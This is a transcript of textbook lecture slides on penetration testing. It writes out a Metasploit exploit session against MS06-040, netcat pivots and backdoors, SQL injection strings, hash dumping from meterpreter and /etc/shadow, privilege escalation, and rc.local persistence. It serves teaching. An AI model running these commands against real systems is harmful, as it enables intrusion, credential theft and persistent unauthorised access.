Presentation is loading. Please wait.

Presentation is loading. Please wait.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.

Published byDwight Deem Modified over 10 years ago

Similar presentations

Presentation on theme: "Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1."— Presentation transcript:

1 Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1 Chapter 8: Penetration Testing

2 Key Forms of Penetration Attacks Buffer overflows Command injection SQL injection 10/12/2014 DRAFT2 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

3 Network Penetration and Metasploit (Console Session) # cd /pentest/exploits/framework3 #./msfconsole msf > search MS06-040 msf > use exploit/windows/smb/ms06_040_netapi msf exploit(ms06_040_netapi) > info msf exploit(ms06_040_netapi) > show payloads msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(ms06_040_netapi) > show options msf exploit(ms06_040_netapi) > set RHOST 10.10.100.100 msf exploit(ms06_040_netapi) > show targets msf exploit(ms06_040_netapi) >set TARGET 5 msf exploit(ms06_040_netapi) >show options msf exploit(ms06_040_netapi) > save msf exploit(ms06_040_netapi) > check msf exploit(ms06_040_netapi) > exploit msf exploit(ms06_040_netapi) > sessions –l msf exploit(ms06_040_netapi) > sessions –i 1 meterpreter> ? 10/12/2014 DRAFT3 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

4 Netcat, Pivoting, and Raw Shells Setting up and connecting a listener: –Target # nc –l –p 80 –Tester # nc 10.10.100.10 80 Setting up a 3 machine pivot: –Target (.30)# nc –l –p 80 –RelaySetup# mknod FIFO p –Relay(.10)# nc –l –p 200 FIFO –Tester # nc –10 10.10.100.10 80 10/12/2014 DRAFT4 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

5 Attacking Web/Internet Applications and Databases SQL injection attacks: –false') OR ('true' = 'true’: Grouping by parentheses –false' OR 'true' = 'true'; --: -- is an SQL comment, ends statement –' OR 'true' = 'true' -- –: 0 ; select * from Student where 0=0 ; -- – 0' UNION SELECT * FROM Student where 0=0 -- Paros Proxy is a Backtrack tool for man in the middle attacks 10/12/2014 DRAFT5 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

6 User Enumeration and Hash Grabbing Gather web email addresses on Backtrack –# cd /pentest/enumeration/google/theHarvester –#./theHarvester.py –d cnn.com –b pgp Hash grabbing with meterpreter –meterpreter> use privs –meterpreter> hashdump Enumeration on Linux –# cut –d: –f1 /etc/passwd Hash grabbing from root on Linux # grep –v ':x:' /etc/shadow | grep –v ':!:' | cut –d: – f2 10/12/2014 DRAFT6 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

7 Password Cracking Password policies on Windows –Local Windows password policies: C:\> net accounts –Windows domain password policies: C:\> net accounts /domain John the Ripper supports password cracking –based on brute force, dictionary, fuzzing Rainbow table techniques are highly efficient algorithms for cracking complex passwords using tables with exhaustive password/hash lists Cain & Abel cracks passwords from all Windows formats, popular network devices, and databases using multiple techniques, such as brute force, dictionary, and rainbow tables 10/12/2014 DRAFT7 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

8 Privilege Escalation Privilege escalation means gaining administrative privileges, e.g. root Some metasploit exploits automatically escalate, e.g. –modules/exploit/unix/smtp/exim4_string_format, used with the shell_reverse_tcp payload Meterpreter can also escalate, for example: –meterpreter > use privs: Load the Privs module –meterpreter > getsystem –h: Help text –meterpreter > getsystem: Privilege escalation –meterpreter > hashdump: Grab password hashes 10/12/2014 DRAFT8 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

9 Final Malicious Attack Phases Forward and Reverse Backdoors –Easy to setup using netcat listeners Entrenchment –To survive reboot add backdoor to /etc/rc.local, /etc/rc.d/rc.local (both Linux) or the Startup Folder (Windows) Hidden Files – Easily accomplished on Windows (checkbox) or Linux (. or.. filename) Rootkits –Rootkits are an ultimate form of malicious entrenchment. 10/12/2014 DRAFT9 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

10 REVIEW CHAPTER SUMMARY Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions 10/12/2014 DRAFT10

Download ppt "Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1."

Similar presentations

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 8, 2014 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 8, 2014 DRAFT1.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 8, 2014 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 8, 2014 DRAFT1.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 8, 2014 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 8, 2014 DRAFT1.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions April 14, 2015 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions April 14, 2015 DRAFT1.
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail.

Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail.
.  User groups o Cisco, SQL, Virtualization  Conferences o GrrCON, SQL Saturday  Hands-On o Capture the Flag o Forensics  RSS  Exploit-DB updates.

.  User groups o Cisco, SQL, Virtualization  Conferences o GrrCON, SQL Saturday  Hands-On o Capture the Flag o Forensics  RSS  Exploit-DB updates.
Armitage and Metasploit Penetration Testing Lab

Armitage and Metasploit Penetration Testing Lab
Computer Security Fundamentals

Computer Security Fundamentals
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.

A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
© 2010 – MAD Security, LLC All rights reserved ArmitageArmitage A Power User’s Interface for Metasploit.

© 2010 – MAD Security, LLC All rights reserved ArmitageArmitage A Power User’s Interface for Metasploit.

Network and Server Attacks and Penetration Chapter 12.

Network and Server Attacks and Penetration Chapter 12.
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.
Hacking Unix/Linux.

Hacking Unix/Linux.
GreenSQL Yuli Stremovsky /MSN/Gtalk:

GreenSQL Yuli Stremovsky /MSN/Gtalk:
The Business of Penetration Testing

The Business of Penetration Testing
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Similar presentations

Ads by Google